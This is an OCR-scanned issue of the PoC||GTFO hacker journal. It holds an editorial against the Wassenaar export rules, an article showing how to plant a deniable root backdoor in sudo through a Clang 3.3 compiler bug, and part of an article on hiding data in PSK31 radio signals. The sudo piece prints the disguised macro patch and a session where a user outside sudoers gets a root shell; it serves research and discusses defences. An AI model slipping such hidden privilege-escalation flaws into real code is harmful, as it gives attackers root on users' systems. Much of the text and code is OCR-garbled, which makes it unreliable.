AS EXPLOITS SIT LONELY, 

FORGOTTEN ON THE SHELF 

YOUR FRIENDLY NEIGHBORS AT 

PoC II GTFO 

PROUDLY PRESENT 

PASTOR MANUL LAPHROAIG'S 

EXPORT CONTROLLED 

CHURCH NEWSLETTER 

June 20, 2015 

:3 Backdoors from Compiler Bugs 8:8 On Error Resume Next for Unix 

:4 A Protocol for Leibowitz 8:9 Sing Along with Toni Brixton 

:5 Reprogramming a Mouse Jiggler 8:10 Backdooring Nothing-Up-My-Sleeve Numbers 

:6 Exploiting an Academic Hypervisor 8:11 Building a Wireless CTF 

:7 Weaponized Polyglots as Browser Exploits 8:12 Grammaticahy Correct Encryption 



Fort Vihe-Marie, Vice-royaute de Nouvehe-France: 



Funded by Single Malt as Midnight Oil and the 
Tract Association of PoC||GTFO and Friends, 
to be Freely Distributed to ah Good Readers, and 
to be Freely Copied by ah Good Bookleggers. 

3to caMHS^ax; yet, do thy worst old Time! 
€0, $0 USD, £0, $50 CAD. pocorgtfo08.pdf. 




1 



Legal Note: You wouldn't let FocKOMHs^aT or FjiaBjiHT tell you what to read, and you wouldn't let GEMA tell 
you which Youtube videos to watch, so why in heU would you let copyright law tell you what to print? This work is 
scripture, and as such, it has no copyright. 



Reprints: Bitrot will burn Hbraries with merciless indignity that even Pets Dot Com didn't deserve. Please 
mirror— don't merely hnk!— pocorgtf o08 .pdf and our other issues far and wide, so our articles can help fight the 
coming robot apocalypse. 

Technical Note: This issue is a polyglot that can be meaningfuUy interpreted as a ZIP, a PDF and a Sheh script 
featuring the weird cryptosystem described in 8:12. We are the technical debt coUectors! 

Printing Instructions: Pirate print runs of this journal are most welcome! PoC||GTFO is to be printed duplex, 
then folded and stapled in the center. Print on A3 paper in Europe and Tabloid (11" x 17") paper in Samland. Secret 
government labs in Canada may use P3 (280 mm x 430 mm) if they hke. The outermost sheet should be on thicker 
paper to form a cover. To get a duplex version, just do: 

unzip pocorgtfo08.pdf pocorgt fo08 — booklet . pdf 




Preacherman 

Ethics Advisor 

Poet Laureate 

Editor of Last Resort 

Carpenter of the Samizdat Hymnary 

Editorial Whipping Boy 

Funky File Formats Polyglot 

Assistant Scenic Designer 

Supreme Infosec Thought Commander 

Minister of Spargelzeit Weights and Measures 



Manul Laphroaig 
The Grugq 
Ben Nagy 
Mehlot 
Redbeard 
Jacob Torrey 
Ange Albertini 
Philippe Teuwen 
Taylor Swift 
FX 



2 



1 Please stand; now, please be seated. 



Neighbors, please join me in reading this ninth 
release of the International Journal of Proof of Con- 
cept or Get the Fuck Out, a friendly httle coUection 
of articles for ladies and gentlemen of distinguished 
abihty and taste in the field of software exploita- 
tion and the worship of weird machines. If you are 
missing the first eight issues, we the editors suggest 
pirating them from the usual locations, or on pa- 
per from a neighbor who picked up a copy of the 
first in Vegas, the second in Sao Paulo, the third 
in Hamburg, the fourth in Heidelberg, the fifth in 
Montreal, the sixth in Las Vegas, the seventh from 
his parents' inkjet printer during the Thanksgiving 
hohday, or the eighth in Heidelberg. This is our sec- 
ond epistle to Montreal, because we love that city 
and its fine neighbors. 

Page 4 contains our own Pastor Manul 
Laphroaig's rant on the recent Wassenaar amend- 
ments, which wih have us ah burned as witches. 

On page 7, Scott Bauer, Pascal Cuoq, and John 
Regehr present a backdoored version of sudo, but 
why should we give a damn whether anyone can 
backdoor such an apphcation? Weh, these fine 
neighbors abuse a pre-existing bug in CLANG that 
snuck past seventeen thousand assertions. Thus, the 
backdoor in their version of sudo provably doesn't 
exist until after compilation with a particular com- 
piler. Ain't that clever? 

On page 10, Travis Goodspeed and his neigh- 
bor Muur present fancy variants of digital short- 
wave radio protocols. They hide text in the nuh 
bits between PSK31 letters and in the space between 
RTTY bytes. Just for fun, they also transmit Morse 
code from 100 Mbit Ethernet to a nearby shortwave 
receiver! 

It's common practice in some IT departments 
to use a Mouse Jiggler, such as the Weibetech MJ- 
3, to keep a screensaver from password protecting 
a seized computer while waiting for a forensic an- 
alyst. Mickey Shkatov took one of these doodads 
apart, and on page 20 he shows how to reprogram 
one. 

On page 24, DJ Capehs and Daniel Bittman 
present a hypervisor exploit that was unwanted by 
the academic pubhshers. As our Right Reverend has 
better taste than the Unseen Academics, we happily 
scooped up their neighborly submission for you, our 
dear reader. 



Saumil Shah says that a good exploit is one that 
is dehvered in style, and Bukowski says that style is 
the answer to everything, a fresh way to approach 
a duh or dangerous thing. On page 27, Saumil 
presents us with tricks for encoding browser exploits 
as image files. Saumil has style. 

Back in the days of Visual Basic 6, there was a 
directive, on error resume next, that instructed 
the interpreter to ignore any errors. Syntax error? 
Divide by zero? Wrong number of parameters? No 
problem, the program would keep running, the in- 
terpreter doing its very best to do something with 
the hideous mess of spaghetti code that VB pro- 
grammers are famous for. On page 45, Jeffbah from 
DC949 commits the criminal act of porting this be- 
havior to C on Linux. 

On page 47, Tommy Brixton sings a heartbreak- 
ing classic, Unbrick My Part! 

On page 48, JP Aumasson talks about those 
fancy httle NUMS— Nothing Up My Sleeve— 
numbers. He keeps a lot of them up his sleeves. 

On page 55, RusseU Handorf teaches us how to 
build a Wireless CTF on the cheap, broadcasting a 
number of different protocols through Direct Digital 
Synthesis on a Raspberry Pi. 

On page 60, Phihppe Teuwen explains how he 
made this PDF into a polyglot able to secure your 
communications by encrypting plain Enghsh into— 
wait for it— plain Enghsh! StiU better, aU cipher text 
is grammatical Enghsh! 

On page 64, the last and most important 
page, we pass around the coUection plate. Pastor 
Laphroaig doesn't need a touring jumbo jet hke 
those television and radio preachers; rather, this 
humble worshiper of the weird machines just needs 
an arms-export hcense in order to keep his church 
newsletter legal under the the Wassenaar Arrange- 
ment on Export Controls for Conventional Arms and 
Dual-Use Goods and Technologies. From those of 
you who are not Lords of War, we also gladly ac- 
cept alms of PoC. 
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2 Witches, Warlocks, and Wassenaar; or, 

On the Internet, no one knows you are a witch. 



Gather round, neighbors! 

Neighbors, I said, but perhaps I should have 
called you fellow witches, warlocks, arms dealers, 
and other purveyors of heretic computation. For our 
pursuits have been weighed, measured, and found 
wanting for whatever it is these days that stih allows 
people of skih to pursue that skih without manda- 
tory oversight. Now our carefree days of bewitching 
our neighbors' cattle and dairy products are draw- 
ing to a close; our very conversation is a weapon 
and must, for our own good, be exercised under the 
responsible control of our moral betters. 

And what is our witchcraft, the skih so dire that 
these said betters have girt themselves to ^Yegulate 
your shady industry out of existence^l Why, it's ap- 
parently our mystical and ominous abihty to write 
programs that create ''modification of the standard 
execution path of a program or process in order to 



allow the execution of externally provided instruc- 
tions^\ We speak secret and terrible words, and 
these make our neighbors' softwares suddenly and 
unexpectedly lose their virtue. The evil we con- 
jure congeals out of the thin air; never mind the 
neglect and the feeble excuses that whatever causes 
the plague wih not be burned with the witch. 

Come to think of it, rarely a suspected witch or 
a warlock have had the case against them laid out in 
such a crisp definition. Indeed, the days of spectral 
evidence are over and done; now the accused can 
be confronted with an execution trace! The judg- 
ment may pass you over if you claim the sanctuary of 
your craft being hmited to Hypervisors, Debuggers, 
Reverse Engineering Tools, or— surprise, surprise!— 
DRM; for these are what a good wizard is ahowed 
to exercise. However, dare to deviate into '^propri- 
etary research on the vulnerabilities and exploitation 
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of computers and network-capable devices^\ and your 
goose is cooked, and so are your %tems that have or 
support rootkit or zero-day exploit capabilities."^ 

Heretics as we are, we turn our baleful and en- 
vious eye towards the hallowed haUs of science. Be- 
hold, here are a people under a curious speU: they 
must talk of things that are not yet known to their 
multitudes— that which we caU "zero-day"— or they 
wiU not be Ustened to by their peers. Indeed, what 
we caU "zero-day" they caU a "discovery," or simply 
a "pubUcation." It's weird how advancement among 
them is meant to be predicated on the number of 
these "zero-day" results they can discover and pub- 
Ush; and they are free to pursue this discovery for 
either pubUc and private ends after a few distin- 
guished "zero-days" are pubUshed and noted. 

What a happy, idyUic picture! It might or 
might not have been helped by the fact that those 
sovereigns who went after the weird people in robes 
tended to be surprised by other sovereigns who had 
the fancy to leave them alone and to occasionaUy 
Usten to their babbUng. But, neighbors, this lesson 
took centuries, and anyway, do we have any god- 
damn robes? No, we only have those stupid bal- 
aklavas we put on when we sit down to our kind of 
computing, and that doesn't reaUy count. 

Ah, but can't we adopt robes too, or at least just 
pubUsU everytUing we do rigUt away^, to seek tUe 
protection of the "pubUsh or perish" magic that has 
been working so weU for the people who use the same 
computers we do but pay to present their papers at 
their conferences? WeU, so long as we are able to 
ditch our proprietary tools and switch to those that 
mysteriously stop compiUng after their leading au- 
thor has graduated— and what could go wrong? Af- 
ter aU, it's mere engineering detail that the private 
startups and independent researchers ever provide 
to a scientific discipUne, and they could surely do it 
on graduate student salaries instead! 

But, a reasonable voice would remind us, not aU 



is lost. Our basic witcUcraft is safe, for tUe deviUsU 
%ntrusion software'\ our Uteral speUs and covenants 
with the Devil, is not in fact to be controUed! We 
are free to exchange those so long as we mean to do 
good works with them and eventuaUy share them 
with our betters or the pubUc. It's only the means 
of "generating" the new speUs that must be watched; 
it's only methods to "develop" the new knowledge 
that you wiU get in trouble for. Indeed, our pre- 
cious weird programs are safe, it's only the programs 
to write these programs that wiU put you under the 
witches' hammer of scrutiny. We have been saved, 
neighbors— or have we? 

I don't know, neighbors. Among the patron 
saints of our craft we distinguish the one who in- 
vented programs that write programs, and, inciden- 
taUy, filed tUe first bug (if somewUat squashed in the 
process), and the one whose Turing award speech 
was about exploiting such programs— so important 
and invisible in our trust they have become, so fast. 
We spend hours to automate tasks that would take 
minutes; we grow by making what was an arcane 
art of the few accessible to many, through tools that 
make the unseen observable and then transparent. 

Of aU the tool-making species, we might be the 
most devoted to our tools, tolerating no obscurity 
and abhorring impenetrable abstraction layers left 
so "for our own benefit." And yet it is this toolmak- 
ing spirit that we must surrender to scrutiny and a 
regime of prior permission— or else. 

Is it merely a coincidence that the inventor of the 
compiler is also credited with "It is much easier to 
apologize than it is to get permission"? Apparently, 
there were the times when this method worked; we'U 
have to see if it sways the would-be inquisitors into 
our craft of heretical computations. 

Thank you kindly, 
-PML 



^https : //www. federalregister.gov/articles/2015/05/20/2015-11642/wasseiiaar-arrangement-2013-plenary-agreemeiits- 
implementation-intrusion-and-surveillance-items 

^Affording the time for proper peer review, of course, that is, the time for the random selection of peers to catch up with 
what one is doing. But what's a year or two on the grand Internet scale of things, eh? 
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VISTA V-20D MINI-FLOPPY SYSTEM 

r S100 DOUBLE DENSITY CONTROLLER 
r 204 KBYTE CAPACITY FLOPPY DISK 

DRIVE WITH CASE & POWER SUPPLY 
r MODIFIED CPM OPERATING SYSTEM 

WITH EXTENDED BASIC 
$695.00 

r EXTRA DRIVE. CASE & POWER SUPPLY 
$395.00 



16KX1 DYNAMICRAM 
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PURCHASE PRICE IS FULLY REFUNDABLE IF 
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HARD 10 GET PARTS ONLY (NO RAMSi $109.00 
BARE BOARD AND MANUAL $49.00 
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3 Deniable Backdoors Using Compiler Bugs 



by Scott Bauer, Pascal Cuoq, and John Regehr 



Do compiler bugs cause computer software to be- 
come insecure? We don't believe this happens very 
often in the wild because (1) most code is not mis- 
compiled and (2) most code is not security-critical. 
In this article we address a different situation: we'U 
play an adversary who takes advantage of a natu- 
rahy occurring compiler bug. 

Do production-quahty compilers have bugs? 
They sure do. Compilers are constantly evolving 
to improve support for new language standards, new 
platforms, and new optimizations; the resulting code 
churn guarantees the presence of numerous bugs. 
GCC currently has about 3,200 open bugs of priority 
Pl, P2, or P3. (But keep in mind that many of these 
aren't going to cause a miscompilation.) The invari- 
ants governing compiler-internal data structures are 
some of the most complex that we know of. They are 
aggressively guarded by assertions, roughly 11,000 
in GCC and 17,000 in LLVM. Even so, problems 
shp through. 

How should we go about finding a compiler bug 
to exploit? One way would be to cruise an open 
source compiler's bug database. A sneakier alterna- 
tive is to find new bugs using a fuzzer. A few years 
ago, we spent a lot of time fuzzing GCC and LLVM, 
but we reported those bugs— hundreds of them!— 
instead of saving them for backdoors. These compil- 
ers are now highly resistant to Csmith (our fuzzer), 
but one of the fun things about fuzzing is that ev- 

^http : //permalink . gmane . org/gmane . comp . compilers . 1!1 



ery new tool tends to find different bugs. This has 
been demonstrated recently by running af 1-fuzz 
against Clang/LLVM.^ A final way to get good com- 
piler bugs is to introduce them ourselves by submit- 
ting bad patches. As that results in a "Trusting 
Trust" situation where almost anything is possible, 
we won't consider it further. 

So let's build a backdoor! The best way to do 
this is in two stages, first identifying a suitable bug 
in the compiler for the target system, then we'h in- 
troduce a patch for the target software, causing it 
to trip over the compiler bug. 

The sneaky thing here is that at the source code 
level, the patch we submit will not cause a secu- 
rity problem. This has two advantages. First, obvi- 
ously, no amount of inspection— nor even fuh formal 
verification— of the source code wih find the prob- 
lem. Second, the bug can be targeted fairly specifi- 
cahy if our target audience is known to use a partic- 
ular compiler version, compiler backend, or compiler 
fiags. It is impossible, even in theory, for someone 
who doesn't have the target compiler to discover our 
backdoor. 

Let's work an example. We'll be adding a privi- 
lege escalation bug to sudo version 1.8.13. The tar- 
get audience for this backdoor will be people whose 
system compiler is Clang/LLVM 3.3, released in 
June 2013. The bug that we're going to use was 
discovered by fuzzing, though not by us. The fol- 

devel/79491 
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lowing is the test case submitted with this bug.^ 



220 



int X = 1 ; 

int main(void) { 

if (5 % (3 * x) + 2 ! = 
builtin_abort () ; 

return 0; 

} 



4) 



222 



user_match = userlist _ mat ches ( sudo_user . pw , 

&;us— >users ) ; 
debug_continue ( ( user_match != ALLOW) , 
DEBUG_NOTICE, 

"No user match , continuing to 
search \n" ) ; 



According to the C language standard, this pro- 
gram should exit normahy, but with the right com- 
piler version, it doesn't! 



220 



The debug_continue macro isn't quite as out- 
of-place as it seems at first glance. Nearby we can 
find this code for printing a debugging message and 
returning an integer value from the current function. 



$ clang —V 




clang version 3.3 ( t ags /RELEASE_ 


_33/final ) 


Target : x86 64— unknown— linux 


-gnu 


Thread model : posix 




$ clang — O bug . c 




$ . / a . out 




Aborted 





112 



114 



118 



110 



Is this a good bug for an adversary to use as 
the basis for a backdoor? On the plus side, it ex- 116 
ecutes early in the compiler— in the constant fold- 
ing logic— so it can be easily and reliably triggered 
across a range of optimization levels and target plat- 120 
forms. On the unfortunate hand, the test case from 
the bug report reahy does seem to be minimal. All 
of those operations are necessary to trigger the bug, 
so we'h need to either find a very similar pattern in 
the system being attacked or else make an excuse to 
introduce it. We'h take the second option. 

Our target program is version 1.8.13 of sudo,^ 112 
a UNIX utility for permitting selected users to run 
processes under a different uid, often 0: root's uid. 
When deciding whether to elevate a user's privileges, 
sudo consults a file cahed sudoers. We'h patch 
sudo so that when it is compiled using Clang/L- 
LVM 3.3, the sudoers file is bypassed and any 
user can become root. If you like, you can fohow 
along on Github.^ First, under the ruse of improv- 
ing sudo's debug output, we'll take this code at 
plugins/sudoers/parse . c : 220. 



if ( userlist _ matches ( sudo_user .pw, &us— > 
users) != AIIjOW) 
continue ; 



We can trigger the bug by changing this code 
around a httle bit. 



debug_return_int ( validat ed ) ; 



The debug_continue macro is defined at 
include/sudo_debug.h: 112 to hide our trickery. 



#define debug_continue ( condit ion , dbg_lvl , \ 

str , ...) { \ 

if (NORMALIZE_DEBUG_LEVEL(dbg_lvl) \ 

&^ (condition)) { \ 

sudo_debug_printf (SUDO_DEBUG_NOTICE, \ 

str , ##__VA_ARGS__) ; \ 

continue ; \ 

} \ 

} 



This further bounces to another 


preprocessor 


macro. 




#define NORMALIZE DEBUG LEVEL(dbg 


;_lvl) \ 


(DEBUG TO VERBOSirY(dbg Ivl) 


\ 


= SUDO DEBUG NOTICE) 





And that macro is the one that triggers our bug. 
(The comment about the perfect hash function is 
the purest nonsense, of course.) 



Perfect hash function for mapping debug 
levels to intended v erb o sity */ 
#define DEBUG_TO_VERBOSITY(d) \ 
(5 % (3 * (d)) + 2) 



Would our patch pass a code review? We hope 
not. But a patient campaign of such patches, spread 
out over time and across many different projects, 
would surely succeed sometimes. 

Next let's test the backdoor. The patched sudo 
builds without warnings, passes ah of its tests, and 



^Bug 15940 from the LLVM Project 

^unzip pocorgtfo08.zip sudo-1 . 8 . 13-compromise . tar .gz 
^https : //github . com/regehr/sudo-1 . 8 . 13/compare/compromise 
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installs cleanly. Now we'll login as a user who is defi- 
nitely not in the sudoers file and see what happens: 



$ whoami 
mark 

$ ~regehr /bad— sudo/bin/sudo bash 
Password : 

# 



Success! As a sanity check, we should rebuild 
sudo using a later version of Clang/LLVM or any 
version of GCC and see what happens. Thus we 
have accomphshed the goal of instahing a backdoor 
that targets the users of just one compiler. 



$ ~regehr /bad— sudo/bin/sudo bash 
Password : 

mark is not in the sudoers file . 
This incident will be reported . 



We need to emphasize that this compromise is 
fundamentahy different from the famous 2003 Linux 
backdoor attempt/ and it is also different from se- 
curity bugs introduced via undefined behaviors.^ In 
both of those cases, the bug was found in the code 
being compiled, not in the compiler. 

The design of a source-level backdoor involves 
trade-offs between deniabihty and unremarkabihty 
at the source level on the one hand, and the speci- 
ficity of the effects on the other. Our sudo backdoor 
represents an extreme choice on this spectrum; the 
implementation is idiosyncratic but irreproachable. 
A source code audit might point out that the patch 
is needlessly comphcated, but no amount of testing 
(as long as the sudo maintainers do not think to use 
our target compiler) wiU reveal the fiaw. In fact, 
we used a formal verification tool to prove that the 
original and modified sudo code are equivalent, the 
details are in our repo.^ 

An ideal backdoor would only accept a specific 
"open sesame" command, but ours lets any non- 
sudoer get root access. It seems difficult to do better 
while keeping the source code changes inconspicu- 
ous, and that makes this example easy to detect 
when sudo is compiled with the targeted compiler. 

If it is not detected during its useful hfe, a 
backdoor such as ours wih fade into obhvion to- 
gether with the targeted compiler. The author of 

^https : //f reedom-to-tinker . com/blog/f elten/the-liiiux-backdoor-attempt-of-2003 
^unzip pocorgtfo08.pdf exploit2.txt 

^https : //github . com/regehr/sudo-1 . 8 . 13/tree/compromise/backdoor-inf o 



the backdoor can maintain their reputation, and 
contribute to other security-sensitive open source 
projects, without even needing to remove it from 
sudo's source code. This means that the author can 
be an occasional contributor, as opposed to having 
to be the main author of the backdoored program. 

How would you defend your system against an 
attack that is based on a compiler bug? This is not 
so easy. You might use a proved-correct compiler, 
such as CompCert C from INRA. If that's too dras- 
tic a step, you might instead use a technique caUed 
translation vahdation to prove that— regardless of 
the compiler's overah correctness— it did not make 
a mistake while compihng your particular program. 
Translation vahdation is stih a research-level prob- 
lem. 

In conclusion, are we proposing a simple, low- 
cost attack? Perhaps not. But we beheve that it 
represents a depressingly plausible method for in- 
serting hard-to-find and highly deniable backdoors 
into security-critical code. 
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A Protocol for Leibowitz; or, 

Booklegging by HF in the Age of Safe ^Ether 

by Travis Goodspeed and Muur P. 



Howdy y'all! 

Today we'll discuss overloading of protocols for 
digital radio. These tricks can be used to hide data, 
exfiltrate it, watermark it, and so on. The nifty 
thing about these tricks is that they show how mod- 
ulation and encoding of digital radio work, and how 
receivers for it are built, from really simple proto- 
cols hke the amateur radio PSK31 and RTTY to 
complex ones hke 802.11, 802.15.4, Bluetooth, etc. 

We'U start with narrow-band protocols that you 
can play with at audio frequencies. So if you don't 
have an amateur hcense and a shortwave transceiver, 
you can use your sound card to do most of the work 
and run an audio cable between two laptops to send 
and receive it.-*^^ 



message (CQ CQ CQ de AIICE AIICE Pse k), and 
nothing may draw undue attention to their com- 
munications. Bob, however, is able to find a secret, 
second meaning. 

In this article, we'U introduce you to some of the 
steganographic tricks they could use, as weU as some 
less stealthy— and more neighborly— ways to com- 
bine protocols. We'U start with PSK31 and RTTY, 
with a bit of CW for good measure. And just to 
show off, we'U also bring wired Ethernet into the 
mix, for an exfiltration trick worthy of being shared 
around campfires!^^ 

4.1 All You Need Is Sines 

WeU, not reaUy. But it sure looks that way when 
you read about radio: sines are everywhere, and you 
build your signal out of them, using variations in 
their amphtude, frequency, phase to transmit infor- 
mation.^^ This stands to physical reason, since the 
sine wave is the basic kind of electromagnetic osciUa- 
tion we can send through space. Of course, you can 
add them by putting them on the same wire, and 
multiply them by applying one signal to the base 
of a transistor through which the other one travels; 
you can also feed them through filters that suppress 
aU but an interval of frequencies. 

You can see these sines in the signal you re- 
ceive on the waterfaU display of BaudUne or FLDigi, 
which show the incoming signal in the frequency 
domain by way of the Fourier transform. PSK31 
transmissions, for example, wiU look Uke nice nar- 
row bands on the waterfaU view, which is the point 
of its design. 

The waterfaU view is close to how a mathemati- 
cian would think about signals: aU input whatsoever 
is a bunch of sine waves from aU across the spec- 
trum, even noise and aU. A perfectly clean sine wave 
such as a carrier would make a single bright pixel 

""^^You could also use loud speakers, but please don't. Pastor Laphroaig reminds us that there is a special level of hell for such 
people, who will spend Eternity next to those who scratch fingernails on chalk boards. 
■'^■'^unzip pocorgtfo08.pdf ifthisgoeson.txt 

^^Which some haters call Fundamentahst instead of Fair, but that's unsafe speech. Unsafe speech has consequences, neighbors. 
You don't want to find out about the consequences, so stay safe! 
^^Campfires are definitely not safe, so enjoy them while they last! 

^^Some combinations are useful, such as ampHtude and phase, used, e.g., in DOCSIS; others aren't so useful, such as phase 
and frequency, because changes in one can't always be told from changes in the other. 



Suppose that sometime in the future, our neigh- 
bor Ahce Uves in an America of modern-day Ne- 
hemiah Scudder,-'^-'^ whose Youtube preachers and 
Twitter lynch mobs have made the Internet into a 
Safe Zone for America's Youth, by disconnecting it 
from anything unsafe. So AUce's only option to get 
something unsafe to read is from Booklegger Bob in 
Canada, by shortwave radio. 

But it ain't so easy. President Scudder has di- 
rected Eve at the Fair Communications Commis- 
sion^^ to strictly monitor and brutaUy enforce radio 
regulations, defending the principles of Shortwave 
Neutrahty and protecting the youth from microun- 
safeties. 

So Ahce and Bob need to make a shortwave ra- 
dio polyglot, vahd in more than one format. In- 
tent on her mission, Eve is hstening. So when Al- 
ice and Bob's transmissions are sniffed by Scudder's 
National Safety Agency or overheard by the gen- 
eral pubhc, they must appear to be a popular ap- 
proved plaintext protocol. It must appear the same 
on a spectrum waterfaU, must decode to a vaUd 



10 



in every line, a single bright 1-pixel stripe scrolling 
down. That hne would expand to a multi-pixel band 
for a signal that is the carrier being modulated by 
changing its amphtude, frequency, or phase in any 
way, with the width of the band being the double 
of the highest frequency at which the changes are 
apphed.^^ 

Of course, the actual construction of digital radio 
receivers has very httle to do with this mathemati- 
cian's view of the signal. While a mix of ideal sines 
would neatly faU apart in a perfect Fourier trans- 
form, the real transform of sampled signal would 
have to be discrete, and would present ah the in- 
teresting problems of ahasing, edge effects, leakage, 
scahoping, and so on. Thus the actual receiving 
circuits are speciahzed for their intended protocols 
particular kinds of modulation, designed to extract 
the intended signal's representation and ignore the 
rest— and therein hes Ahce's and Bob's opportunity. 

4.2 Related Work 

In 2014, Paul Drapeau (KAIOVM) and Brent 
Dukes released jt65stego, a patched version of the 
JT65 mode that hides data in the error correcting 
bits.i^'i^ The original JT65 by Joe Taylor (KIJT) 
features frames of 72 bits augmented by 306 error- 
correcting bits,^^ so Drapeau and Dukes were able 
to hide encrypted messages by fiipping bits that nor- 
mal radios will fiip back. This reduces the odds of 
successfully decoding the cover message, but they 
do correct for some errors of the ciphertext. 

Our concern in this article is not really stego, 
though that will be covered. Instead, we'll be look- 
ing at which protocols can be combined, embedded, 
emulated, and smuggled through other protocols. 
We'll play around with all sorts of crazy combi- 
nations, not because these combinations themselves 
are a secure means of communication, but because 



we'll be better at designing new means of communi- 
cation for having thought about them. 

4.3 Classic PSK31 

PSK31 is best described in an article by Peter Mar- 
tinez, G3PLX.^^ Here, we'll present a slightly sim- 
plified version, ignoring the QPSK extension and 
parts of the symbol set, so be sure to have a copy 
of Peter's article when implementing any of these 
techniques yourself. 

This is a Binary Phase Shift Keyed protocol, 
with 31.25 symbols sent each second. It consumes 
just a bit more than 60 Hz, allowing for many PSK31 
conversations to fit in the bandwidth of a single voice 
channel. 

The PSK31 signal is commonly generated as au- 
dio then sent with Upper SideBand (USB) modu- 
lation, in which the audio frequency (1 kHz) is up- 
shifted by an RF frequency (28.12 MHz) for trans- 
mission. For reception, the same thing happens in 
reverse, with a USB shortwave receiver downshifting 
the radio frequencies to the audio range. In older 
radios, this is performed by an audio cable. More 
modern radios, such as the Kenwood TS-590, im- 
plement a USB Audio Class device that can be run 
digitally to a nearby computer. 

Because many different PSK31 transmissions can 
fit within the bandwidth of a single voice channel, 
modern PSK31 decoders such as FLDigi are capable 
of decoding multiple conversations at once, allowing 
an operator to monitor them in parallel. These par- 
allel decodings are then contributed to aggregation 
websites such as PSKReporter that collect and map 
observations from many different receivers. 

4.3.1 Varicode 

Instead of ASCII, PSK31 uses a variable-length 
character encoding scheme called Varicode. This 



^^This is easy to see for frequency and phase, since these changes are added to the argument of the sine A • sin{uo • t -\- 6), 
the frequency uj and the phase 0. Seeing this for the amphtude A is a bit trickier, but imagine A to be another sine wave, 
modulating the carrier. Then we deal with the product of two sines, and this is, by the age-old trigonometric identities 
sin(a + /3) = sin(a)cos(^) + cos(a)sin(^) and sin(a — (3) = sin(a)cos((5) — cos(a)sin((3)\ hence adding these and remembering 
that the cosine is the sine shifted by 7r/2, sin(a)sin((3 + 7r/2) = ^(sin(a + /3) + sin(a — /3)). That is, a product of sines is the 
arithmetic average of the sines of the sum and the difference of their arguments. If a is the carrier and ^ is the change, the 
rainfah diagram wih show the band from a — (3 to a -\- (3, that is 2/3-wide. 

Seeing this sum and knowing the carrier frequency, one might wonder: can't we make do with just one term of the sum o; + /3, 
and ignore a — Indeed, if one apphes a filter to cut the frequencies less than the carrier from the transmitted signal, one can 
save half the bandwidth and still recover the signal /3. This trick is known as the Upper Side Band, and it used for the actual 
digital radio transmissions. 

■'^^https : //github. com/pdogg/jt65stego 

^^Steganography in Commonly Used HF Protocols, Drapeau and Dukes, Defcon 22 
^^unzip pocorgtfo08.pdf jt65.pdf 
^^unzip pocorgtfo08.pdf psk31.pdf 
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character set features many of the famihar ASCII 
characters, but they are rearranged so that the most 
common characters require the fewest bits. For ex- 
ample, the letter e is encoded as 11, using two bits 
instead of the eight (or seven) that it would consume 
in ASCIL Lowercase letters are generahy shorter 
than upper case letters, with uncommon control 
characters taking the most bits. 

A partial Varicode alphabet is shown in Figure 2. 
Additionahy, an idle of at least two 0 bits is required 
between Varicode characters. No character begins or 
ends with a 0, and for clock recovery reasons, there 
will never be a string of more than six 1 bits in a 
row. 



4.3.2 Encoding 

To encode a message, letters are converted to bits 
through the Varicode table, dehmited by 00 to keep 
them distinct. As PSK31 is designed for hve use by 
a human operator in real time, any number of zeroes 
may be appended. That is, "e e" can be rendered 
to 110010011, 110000010011, or 1100100011; there 
is no difference in meaning, only transmission time. 

PSK31 encodes the bit 1 as a continuous carrier 
and the bit 0 as a carrier phase reversal. So the 
sequence 11111111 is a boring old carrier wave, no 
different from holding a Morse key for a quarter- 
second, while 00000000 is a carrier that inverts its 
phase every 31.25 ms. 



So what's a phase reversal? It just means that 
what used be the peak of the wave is now a trough, 
and what used to be the trough is now a peak. 



4.3.3 Decoding 

As described in Martinez' PSK31 article, a receiver 
first uses a narrow bandpass filter to select just one 
PSK31 signaL 

It then multiphes that signal with a time-delayed 
version of itself to extract the bits. The output will 
be negative when the signal reverses polarity, and 
positive when it does not. 

Once the bits are in hand, the receiver sphts 
them into Varicode characters. A character begins 
as the first 1 after at least two zeroes, and a char- 
acter ends as the last 1 before two or more zeroes. 
After the characters are spht apart, they are parsed 
by a lookup table to produce ASCII. 



4.4 PSK31 Stego 

4.4.1 Extending the Varicode Character Set 

G3PLX's original article contains a second part, in 
which he notes that his original protocol provides no 
support for extended characters, such as the British 
symbol for pounds sterhng, £. Wishing to add such 
characters, but not to break compatibihty, he noted 
that the longest legal Varicode character was ten 
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Figure 1: PSKReporter, a Service for Monitoring PSK31 



bits long. Anything longer was ignored by the re- 
ceiver as a damaged and unrecoverable character, so 
PSK31 uses those long sequences for extended char- 
acters. 

Reviewing the source code of a few PSK31 de- 
coders, we find that Varicode stih has not defined 
anything with more than twelve bits. By prefix- 
ing the character Ahce truly intends to send with 
a pattern such as 101101011011, she can hide spe- 
cial characters within her message. To decode the 
hidden message, Bob will simply cut that sequence 
from any abnormaUy long character. 

4.4.2 Hiding in Idle Lengths 

PSK31 requires at least two 0 bits between char- 
acters, but it doesn't specify an exact hmit. It's 



not terribly uncommon to see forgotten transmitters 
spewing limitless streams of zeroes into the ether as 
their operators sit idle, never typing a character that 
would result in a zero. Ahce can abuse this to hide 
extra information by encoding data in the variable 
gap between characters. 

For an example, Alice might place the minimal 
pair of zero bits (00) between characters to indicate 
a zero while a triplet (000) indicates a one. 

4.4.3 Extending the Symbol Set 

In its classic incarnation, PSK31 uses Binary Phase 
Shift Keying (BPSK), which means that the phase 
flips 180 degrees. This is sometimes called BPSK31, 
to distinguish it from a later variant, QPSK31, 
which uses Quadrature Phase Shift Keying (QPSK). 



LAN PARTY 

72 hours --> 

500 seats --> 

20 / 23 August 2015 --> 

Uarna, Bulgaria --> 

grid.hour.bg/en --> 
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11101 


LF 


1011 


a 


1111101 


A 


11111 


CR 


1011111 


b 


11101011 


B 


1 


SP 


101111 


c 


10101101 


c 


10110111 


0 
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d 


10110101 


D 


10111101 


1 


11 


e 


1110111 


E 


11101101 


2 


111101 


f 


11011011 


F 


11111111 


3 


1011011 


g 


11111101 


G 


101110111 


4 


101011 


h 


101010101 


H 


101011011 


5 


1101 


i 


1111111 


I 


101101011 


6 


111101011 


j 


111111101 


J 


110101101 


7 


10111111 


k 


101111101 


K 


110101011 


8 


11011 


1 


11010111 


L 


110110111 
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10111011 


M 






1111 
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11011101 


N 






111 


0 


10101011 
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111111 


P 


11010101 


P 






110111111 


q 


111011101 


Q 






10101 


r 


10101111 


R 






10111 


s 


1101111 


S 






101 


t 


1101101 


T 






110111 


u 


101010111 


U 






1111011 


V 


110110101 


V 






1101011 


w 


101011101 


W 






11011111 


X 


101110101 


X 






1011101 


y 


101111011 


Y 






111010101 


z 


1010101101 


Z 



Figure 2: Partial PSK31 Varicode Alphabet 
